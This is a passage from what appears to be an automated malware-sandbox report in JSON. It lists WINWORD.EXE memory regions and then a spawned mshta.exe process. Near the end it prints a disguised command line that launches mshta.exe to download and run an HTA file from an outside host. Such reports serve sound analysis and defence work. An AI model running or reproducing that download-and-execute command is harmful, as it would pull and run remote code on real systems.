"No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 51052544, "type": "region", "version": 1 }, "end_va": 51118079, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x00000000030b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51052544, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 51118080, "type": "region", "version": 1 }, "end_va": 51380223, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x00000000030c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51118080, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 51380224, "type": "region", "version": 1 }, "end_va": 55521279, "entry_point": 0, "filename": null, "id": "region_221", "name": "pagefile_0x0000000003100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 51380224, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 55574528, "type": "region", "version": 1 }, "end_va": 55640063, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000003500000", "norm_filename": null, "region_type": "private_memory", "start_va": 55574528, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 55640064, "type": "region", "version": 1 }, "end_va": 55705599, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000003510000", "norm_filename": null, "region_type": "private_memory", "start_va": 55640064, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 55705600, "type": "region", "version": 1 }, "end_va": 56754175, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x0000000003520000", "norm_filename": null, "region_type": "private_memory", "start_va": 55705600, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 56754176, "type": "region", "version": 1 }, "end_va": 56819711, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000003620000", "norm_filename": null, "region_type": "private_memory", "start_va": 56754176, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 56819712, "type": "region", "version": 1 }, "end_va": 56885247, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x0000000003630000", "norm_filename": null, "region_type": "private_memory", "start_va": 56819712, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 56885248, "type": "region", "version": 1 }, "end_va": 56950783, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x0000000003640000", "norm_filename": null, "region_type": "private_memory", "start_va": 56885248, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 56950784, "type": "region", "version": 1 }, "end_va": 57016319, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x0000000003650000", "norm_filename": null, "region_type": "private_memory", "start_va": 56950784, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57016320, "type": "region", "version": 1 }, "end_va": 57081855, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x0000000003660000", "norm_filename": null, "region_type": "private_memory", "start_va": 57016320, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57081856, "type": "region", "version": 1 }, "end_va": 57147391, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x0000000003670000", "norm_filename": null, "region_type": "private_memory", "start_va": 57081856, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 57147392, "type": "region", "version": 1 }, "end_va": 57409535, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x0000000003680000", "norm_filename": null, "region_type": "private_memory", "start_va": 57147392, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57409536, "type": "region", "version": 1 }, "end_va": 57475071, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x00000000036c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57409536, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57475072, "type": "region", "version": 1 }, "end_va": 57540607, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x00000000036d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57475072, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57540608, "type": "region", "version": 1 }, "end_va": 57606143, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x00000000036e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57540608, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57606144, "type": "region", "version": 1 }, "end_va": 57671679, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x00000000036f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57606144, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57671680, "type": "region", "version": 1 }, "end_va": 57737215, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000003700000", "norm_filename": null, "region_type": "private_memory", "start_va": 57671680, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 61440, "start_va": 57737216, "type": "region", "version": 1 }, "end_va": 57798655, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x0000000003710000", "norm_filename": null, "region_type": "private_memory", "start_va": 57737216, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 57802752, "type": "region", "version": 1 }, "end_va": 57810943, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x0000000003720000", "norm_filename": null, "region_type": "private_memory", "start_va": 57802752, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 57868288, "type": "region", "version": 1 }, "end_va": 57872383, "entry_point": 57868288, "filename": "\\Windows\\SysWOW64\\en-US\\msctf.dll.mui", "id": "region_239", "name": "msctf.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\msctf.dll.mui", "region_type": "memory_mapped_file", "start_va": 57868288, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57933824, "type": "region", "version": 1 }, "end_va": 57999359, "entry_point": 0, "filename": null, "id": "region_240", "name": "private_0x0000000003740000", "norm_filename": null, "region_type": "private_memory", "start_va": 57933824, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 57999360, "type": "region", "version": 1 }, "end_va": 58261503, "entry_point": 0, "filename": null, "id": "region_241", "name": "private_0x0000000003750000", "norm_filename": null, "region_type": "private_memory", "start_va": 57999360, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 58261504, "type": "region", "version": 1 }, "end_va": 58265599, "entry_point": 0, "filename": null, "id": "region_242", "name": "pagefile_0x0000000003790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 58261504, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 139264, "start_va": 58327040, "type": "region", "version": 1 }, "end_va": 58466303, "entry_point": 0, "filename": null, "id": "region_243", "name": "private_0x00000000037a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 58327040, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 58523648, "type": "region", "version": 1 }, "end_va": 58589183, "entry_point": 0, "filename": null, "id": "region_244", "name": "private_0x00000000037d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 58523648, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 58589184, "type": "region", "version": 1 }, "end_va": 58851327, "entry_point": 0, "filename": null, "id": "region_245", "name": "private_0x00000000037e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 58589184, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 58851328, "type": "region", "version": 1 }, "end_va": 59113471, "entry_point": 0, "filename": null, "id": "region_246", "name": "private_0x0000000003820000", "norm_filename": null, "region_type": "private_memory", "start_va": 58851328, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 24576, "start_va": 59113472, "type": "region", "version": 1 }, "end_va": 59138047, "entry_point": 0, "filename": null, "id": "region_247", "name": "private_0x0000000003860000", "norm_filename": null, "region_type": "private_memory", "start_va": 59113472, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 59179008, "type": "region", "version": 1 }, "end_va": 59441151, "entry_point": 0, "filename": null, "id": "region_248", "name": "private_0x0000000003870000", "norm_filename": null, "region_type": "private_memory", "start_va": 59179008, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 59441152, "type": "region", "version": 1 }, "end_va": 63635455, "entry_point": 0, "filename": null, "id": "region_249", "name": "pagefile_0x00000000038b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 59441152, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 63635456, "type": "region", "version": 1 }, "end_va": 63639551, "entry_point": 0, "filename": null, "id": "region_250", "name": "private_0x0000000003cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 63635456, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 63700992, "type": "region", "version": 1 }, "end_va": 63963135, "entry_point": 0, "filename": null, "id": "region_251", "name": "private_0x0000000003cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 63700992, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 63963136, "type": "region", "version": 1 }, "end_va": 64749567, "entry_point": 63963136, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_252", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 63963136, "timestamp": "00:00:22.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 64749568, "type": "region", "version": 1 }, "end_va": 64753663, "entry_point": 0, "filename": null, "id": "region_253", "name": "private_0x0000000003dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 64749568, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 64815104, "type": "region", "version": 1 }, "end_va": 65863679, "entry_point": 0, "filename": null, "id": "region_254", "name": "private_0x0000000003dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 64815104, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 90112, "start_va": 65863680, "type": "region", "version": 1 }, "end_va": 65953791, "entry_point": 0, "filename": null, "id": "region_255", "name": "private_0x0000000003ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 65863680, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 65994752, "type": "region", "version": 1 }, "end_va": 66256895, "entry_point": 0, "filename": null, "id": "region_256", "name": "private_0x0000000003ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 65994752, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 66256896, "type": "region", "version": 1 }, "end_va": 66293759, "entry_point": 0, "filename": null, "id": "region_257", "name": "private_0x0000000003f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 66256896, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 66322432, "type": "region", "version": 1 }, "end_va": 66387967, "entry_point": 0, "filename": null, "id": "region_258", "name": "private_0x0000000003f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 66322432, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 66387968, "type": "region", "version": 1 }, "end_va": 66424831, "entry_point": 0, "filename": null, "id": "region_259", "name": "private_0x0000000003f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 66387968, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 66453504, "type": "region", "version": 1 }, "end_va": 66473983, "entry_point": 0, "filename": null, "id": "region_260", "name": "private_0x0000000003f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 66453504, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 81920, "start_va": 66519040, "type": "region", "version": 1 }, "end_va": 66600959, "entry_point": 0, "filename": null, "id": "region_261", "name": "private_0x0000000003f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 66519040, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 66650112, "type": "region", "version": 1 }, "end_va": 66715647, "entry_point": 0, "filename": null, "id": "region_262", "name": "private_0x0000000003f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 66650112, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 66715648, "type": "region", "version": 1 }, "end_va": 66727935, "entry_point": 0, "filename": null, "id": "region_263", "name": "private_0x0000000003fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66715648, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 77824, "start_va": 66781184, "type": "region", "version": 1 }, "end_va": 66859007, "entry_point": 0, "filename": null, "id": "region_264", "name": "private_0x0000000003fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66781184, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 66912256, "type": "region", "version": 1 }, "end_va": 66977791, "entry_point": 0, "filename": null, "id": "region_265", "name": "private_0x0000000003fd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66912256, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 66977792, "type": "region", "version": 1 }, "end_va": 66994175, "entry_point": 0, "filename": null, "id": "region_266", "name": "private_0x0000000003fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66977792, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 67043328, "type": "region", "version": 1 }, "end_va": 67047423, "entry_point": 0, "filename": null, "id": "region_267", "name": "private_0x0000000003ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 67043328, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 67108864, "type": "region", "version": 1 }, "end_va": 67112959, "entry_point": 0, "filename": null, "id": "region_268", "name": "private_0x0000000004000000", "norm_filename": null, "region_type": "private_memory", "start_va": 67108864, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 67305472, "type": "region", "version": 1 }, "end_va": 67371007, "entry_point": 0, "filename": null, "id": "region_269", "name": "private_0x0000000004030000", "norm_filename": null, "region_type": "private_memory", "start_va": 67305472, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 67371008, "type": "region", "version": 1 }, "end_va": 71565311, "entry_point": 0, "filename": null, "id": "region_270", "name": "private_0x0000000004040000", "norm_filename": null, "region_type": "private_memory", "start_va": 67371008, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 72155136, "type": "region", "version": 1 }, "end_va": 72417279, "entry_point": 0, "filename": null, "id": "region_271", "name": "private_0x00000000044d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 72155136, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 72679424, "type": "region", "version": 1 }, "end_va": 73727999, "entry_point": 0, "filename": null, "id": "region_272", "name": "private_0x0000000004550000", "norm_filename": null, "region_type": "private_memory", "start_va": 72679424, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 73924608, "type": "region", "version": 1 }, "end_va": 74973183, "entry_point": 0, "filename": null, "id": "region_273", "name": "private_0x0000000004680000", "norm_filename": null, "region_type": "private_memory", "start_va": 73924608, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 3928064, "start_va": 74973184, "type": "region", "version": 1 }, "end_va": 78901247, "entry_point": 0, "filename": null, "id": "region_274", "name": "private_0x0000000004780000", "norm_filename": null, "region_type": "private_memory", "start_va": 74973184, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 79560704, "type": "region", "version": 1 }, "end_va": 79822847, "entry_point": 0, "filename": null, "id": "region_275", "name": "private_0x0000000004be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 79560704, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 79822848, "type": "region", "version": 1 }, "end_va": 80871423, "entry_point": 0, "filename": null, "id": "region_276", "name": "private_0x0000000004c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 79822848, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 81264640, "type": "region", "version": 1 }, "end_va": 82313215, "entry_point": 0, "filename": null, "id": "region_277", "name": "private_0x0000000004d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 81264640, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 82313216, "type": "region", "version": 1 }, "end_va": 83361791, "entry_point": 0, "filename": null, "id": "region_278", "name": "private_0x0000000004e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 82313216, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 83361792, "type": "region", "version": 1 }, "end_va": 84410367, "entry_point": 0, "filename": null, "id": "region_279", "name": "private_0x0000000004f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 83361792, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 796131328, "type": "region", "version": 1 }, "end_va": 796487679, "entry_point": 796131328, "filename": "\\Program Files (x86)\\Microsoft Office\\Office12\\WINWORD.EXE", "id": "region_280", "name": "winword.exe", "norm_filename": "c:\\program files (x86)\\microsoft office\\office12\\winword.exe", "region_type": "memory_mapped_file", "start_va": 796131328, "timestamp": "00:00:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10342400, "start_va": 1875378176, "type": "region", "version": 1 }, "end_va": 1885720575, "entry_point": 1875378176, "filename": "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\1033\\MSOINTL.DLL", "id": "region_281", "name": "msointl.dll", "norm_filename": "c:\\program files (x86)\\common files\\microsoft shared\\office12\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 1875378176, "timestamp": "00:00:22.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6635520, "start_va": 1885732864, "type": "region", "version": 1 }, "end_va": 1892368383, "entry_point": 1885732864, "filename": "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\MSORES.DLL", "id": "region_282", "name": "msores.dll", "norm_filename": "c:\\program files (x86)\\common files\\microsoft shared\\office12\\msores.dll", "region_type": "memory_mapped_file", "start_va": 1885732864, "timestamp": "00:00:22.779", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe http://w-szczecin.pl/img2/NEW15_10.doc/index.hta ", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_2", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000427-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_427", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:31.217", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000428-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_428", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:31.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_429", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:31.217", "type": "region", 